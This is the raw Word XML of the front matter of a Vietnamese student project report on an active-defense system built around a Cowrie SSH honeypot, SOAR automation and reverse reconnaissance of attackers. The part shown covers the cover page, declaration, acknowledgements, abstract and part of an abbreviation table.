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1701586925" name="Picture 1701586925"/>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HỆ ĐIỀU HÀNH WINDOWS VÀ LINUX/UNIX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="280" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="64748B"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>MÃ HỌC PHẦN: INT1487</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29"/>
        </w:rPr>
        <w:t>HỆ THỐNG PHÒNG THỦ CHỦ ĐỘNG (ACTIVE DEFENSE) KẾT HỢP SSH HONEYPOT, TỰ ĐỘNG HÓA PHẢN ỨNG SỰ CỐ VÀ TRINH SÁT NGƯỢC KẺ TẤN CÔNG</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733"/>
        <w:gridCol w:w="4733"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Giảng viên hướng dẫn:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>ThS. Quản Trọng Thế</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sinh viên thực hiện:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nguyễn Gia Hào</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mã sinh viên:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>B24DCAT088</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lớp:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>INT1487-20261-03</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14:paraId="4C465AFC"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t>LỜI CAM ĐOAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421D573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Tôi xin cam đoan bản báo cáo đồ án với đề tài: 'Nghiên cứu, Thiết kế và Triển khai Hệ thống Phòng thủ Chủ động (Active Defense) kết hợp SSH Honeypot (Cowrie), Tự động hóa Phản ứng sự cố (SOAR) và Trinh sát ngược Kẻ tấn công' là công trình nghiên cứu và phát triển nghiêm túc của cá nhân tôi dưới sự định hướng, hướng dẫn của Giảng viên hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA7BD1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Toàn bộ hệ thống mã nguồn bao gồm Động cơ tương quan sự kiện an ninh (Correlation Engine), Phân hệ trinh sát ngược (Reverse Intelligence), Phân hệ bẫy mồi Honeytoken và khử ẩn danh (Active De-anonymization), Phân hệ phân tích mã độc tĩnh (Malware Analyzer) và Bot SOAR Telegram tương tác 2 chiều đều được tự nghiên cứu, thiết kế kiến trúc và lập trình bằng ngôn ngữ Python, không sao chép nguyên mẫu từ bất kỳ công trình hoặc đồ án nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DC23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Các tài liệu, số liệu tham khảo và trích dẫn trong đồ án được ghi chú nguồn gốc rõ ràng, tuân thủ đúng quy định về liêm chính học thuật. Tôi xin chịu hoàn toàn trách nhiệm trước Hội đồng Đánh giá nếu có bất kỳ sự thiếu trung thực nào xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1A8D9" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="400" w:after="600" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="righ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6"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>(Ký và ghi rõ họ tên)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>[Họ và tên sinh viên]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E17955A" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C975BD"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LỜI CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B697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hoàn thành đồ án này một cách trọn vẹn và đạt được kết quả nghiên cứu có tính thực tiễn cao, tôi xin bày tỏ lòng biết ơn sâu sắc và chân thành nhất tới các Thầy/Cô giáo trong Khoa An toàn Thông tin &amp; Mạng Máy tính đã tận tình truyền đạt những nền tảng kiến thức chuyên môn quý báu trong suốt quá trình học tập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E09F1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Đặc biệt, tôi xin gửi lời cảm ơn sâu sắc nhất tới Giảng viên hướng dẫn. Thầy đã đưa ra những lời góp ý mang tính bước ngoặt, thẳng thắn chỉ ra rằng 'việc chỉ cài đặt một ứng dụng Honeypot có sẵn và lập trình gửi tin nhắn thông báo cơ bản chỉ là mức ứng dụng người dùng, thiếu hàm lượng khoa học và kỹ thuật chuyên sâu'. Chính lời nhận xét mang tính xây dựng đó đã là động lực to lớn giúp tôi thay đổi hoàn toàn cách tiếp cận, không dừng lại ở việc áp dụng công cụ bề nổi mà đi sâu vào nghiên cứu bản chất kiến trúc phòng thủ chủ động, thiết kế thuật toán tương quan TTPs theo MITRE ATT&amp;CK, phát triển cơ chế trinh sát ngược (Reverse OSINT), bẫy mồi Honeytokens và xây dựng một hệ sinh thái SOAR Mini-SOC tự động hóa phản ứng toàn diện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43146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Cuối cùng, tôi xin chân thành cảm ơn gia đình, bạn bè và các đồng nghiệp đã luôn ủng hộ, tạo điều kiện tốt nhất về tinh thần và môi trường nghiên cứu trong suốt thời gian thực hiện đề tài này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72D3B1"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3F2FF515"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TÓM TẮT ĐỒ ÁN</w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Trong bối cảnh các cuộc tấn công không gian mạng ngày càng gia tăng về mức độ tinh vi và tần suất, đặc biệt là các cuộc tấn công tự động từ các mạng máy tính ma (Botnet) nhắm vào dịch vụ điều khiển từ xa SSH/Telnet, các giải pháp phòng thủ thụ động truyền thống (như tường lửa tĩnh, hệ thống IDS/IPS thông thường) dần bộc lộ nhiều điểm nghẽn nghiêm trọng: độ trễ phát hiện cao, thiếu khả năng phân loại động cơ đối thủ và hoàn toàn bị động trong việc ngăn chặn các đợt rà quét tự động tốc độ cao. Mặc dù công nghệ bẫy Honeypot (điển hình là Cowrie) đã chứng minh được hiệu quả trong việc thu thập hành vi tấn công, nhưng việc dừng lại ở mức cài đặt phần mềm và gửi thông báo thụ động chỉ mang tính chất thống kê đơn thuần, chưa thể hiện được giá trị tác chiến và kỹ thuật công nghệ thông tin chuyên sâu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA00E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Đề tài này đề xuất và hiện thực hóa một kiến trúc hệ thống Phòng thủ Chủ động (Active Defense &amp; Deception Ecosystem) kết hợp Honeypot SSH với Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công (Reverse Reconnaissance). Hệ thống được xây dựng trên mô hình 5 phân lớp hoàn chỉnh, tự phát triển bằng ngôn ngữ Python: (1) Phân hệ Thu thập &amp; Phân tích Sự kiện thời gian thực từ Cowrie; (2) Động cơ Tương quan Sự kiện thông minh ánh xạ tự động các hành vi xâm nhập sang ma trận TTPs chuẩn MITRE ATT&amp;CK (như T1110.001 Brute Force, T1078 Valid Accounts, T1105 Ingress Tool Transfer, T1552 Honeytoken Access); (3) Phân hệ Trinh sát ngược (Reverse Intelligence) tự động thu thập OSINT từ AbuseIPDB, Shodan API, tọa độ GeoIP và kỹ thuật quét cổng an toàn; (4) Phân hệ Bẫy mồi Honeytokens khử ẩn danh (De-anonymization) gài các tài liệu bí mật mồi để lật tẩy IP thật của kẻ tấn công ngay cả khi đối phương sử dụng Proxy/VPN; (5) Phân hệ Phân tích Mã độc tự động trích xuất IOCs và tra cứu VirusTotal; (6) Động cơ Thực thi SOAR hỗ trợ chặn tường lửa động và kỹ thuật giam lỏng Tarpitting (làm nghẽn luồng tài nguyên của attacker); cùng một Telegram SOAR Bot tương tác 2 chiều cho phép chuyên viên SOC ra quyết định tức thì thông qua bàn phím Inline Buttons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F620C7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Kết quả thực nghiệm trên môi trường Lab mô phỏng đa kịch bản và môi trường mạng Internet thực tế cho thấy hệ thống đã rút ngắn thời gian phản ứng trung bình từ 15-20 phút (thao tác thủ công) xuống chỉ còn 1.8 - 2.5 giây (tự động hóa SOAR), giảm thiểu 98% áp lực tải của các đợt tấn công brute-force nhờ cơ chế Tarpitting, đồng thời nâng cao độ chính xác trong việc định danh và lập hồ sơ mối đe dọa (Attacker Profiling). Đề tài khẳng định bước chuyển dịch vượt bậc từ mô hình triển khai ứng dụng bề nổi sang một giải pháp kỹ thuật an ninh mạng chủ động, có tính học thuật cao và khả năng áp dụng thực tiễn trong các trung tâm điều hành an ninh mạng (SOC) quy mô vừa và nhỏ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85FE71"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lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="227EDF2A"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DANH MỤC THUẬT NGỮ VÀ TỪ VIẾT TẮT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784404E1"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0.1: Bảng giải nghĩa các thuật ngữ viết tắt trong đồ án</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>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786FB2AD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="647C158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Thuật ngữ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="075314E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đầy đủ tiếng Anh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19554CC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Ý nghĩa / Diễn giải tiếng Việt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="4FE30F0A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70269A1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SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13F37A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Security Operations Center</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E9FB4A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Trung tâm điều hành và giám sát an ninh mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="65B929A1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54C4C37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SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B8C1F2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Security Orchestration, Automation, and Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6993C9F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Nền tảng điều phối, tự động hóa và phản ứng an ninh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="77553B8E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B7EF83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IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2104C04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Indicators of Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E503D8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Dấu hiệu chỉ điểm xâm nhập (IP, Hash, Domain, URL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="56DE17A8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BDABCC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TTPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31892AC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Tactics, Techniques, and Procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="763B2A9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Chiến thuật, Kỹ thuật và Quy trình tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="53909C41" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="213E6D6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OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72F825C4" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>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Open Source</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34CDBB2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Tình báo an ninh từ nguồn mở</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="28D3C319" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DC75D7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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1458FDF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Adversarial Tactics, Techniques, and Common Knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3512AF1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Khung cơ sở tri thức chiến thuật và kỹ thuật của kẻ tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="2DBF2925" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EF0635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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="471F982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Secure Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="221C2B8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Giao thức điều khiển máy chủ dòng lệnh mã hóa an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="55E9B4AF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="199A4C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ASN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F70FA3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Autonomous System Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C3B9C5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Số hiệu hệ thống tự trị của các nhà cung cấp mạng ISP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="723B7E29" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01C579D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API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FDEEB0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Application Programming Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75EBCD9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Giao diện lập trình ứng dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="646A2CE2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F63D66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C2 / C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6425938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 xml:space="preserve">Command and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
